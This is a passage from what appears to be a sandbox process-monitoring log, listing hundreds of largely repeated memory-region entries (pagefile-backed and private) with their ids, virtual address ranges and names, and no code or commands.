pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8576 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8577 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8578 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8579 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8580 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8581 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8582 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8583 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8584 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8585 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8586 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8587 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8588 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8589 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8590 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8591 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8592 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8593 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8594 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8595 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8596 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8597 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8598 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8599 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8600 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8601 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8602 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8603 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8604 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8605 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8606 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8607 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8608 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8609 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8610 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8611 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8612 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8613 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8614 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8615 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8616 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8617 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8618 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8619 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8620 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8621 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8622 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8623 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8624 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8625 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8626 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8627 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8628 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8629 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8630 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8631 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8632 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8633 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8634 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8635 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8636 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8637 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8638 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8639 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8640 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8641 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8642 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8643 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8644 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8645 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8646 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8647 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8648 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8649 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8650 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8651 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8652 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8653 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8654 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8655 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8656 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8657 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8658 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8659 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8660 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8661 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8662 start_va = 0x88b0000 end_va = 0x88effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000088b0000" filename = "" Region: id = 8663 start_va = 0x88f0000 end_va = 0x892ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000088f0000" filename = "" Region: id = 8664 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8665 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8666 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8667 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8668 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8669 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8670 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8671 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8672 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8673 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8674 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8675 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8676 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8677 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8678 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8679 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8680 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8681 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8682 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8683 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8684 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8685 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8686 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8687 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8688 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8689 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8690 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8691 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8692 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8693 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8694 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8695 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8696 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8697 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8698 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8699 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8700 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8701 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8702 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8703 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8704 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8705 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8706 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8707 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8708 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8709 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8710 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8711 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8712 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8713 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8714 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8715 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8716 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8717 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8718 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8719 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8720 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8721 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8722 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8723 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8724 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8725 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8726 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8727 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8728 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8729 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8730 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8731 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8732 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8733 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8734 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8735 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8736 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8737 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8738 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8739 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8740 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8741 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8742 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8743 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8744 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8745 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8746 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8747 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8748 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8749 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8750 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8751 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8752 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8753 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8754 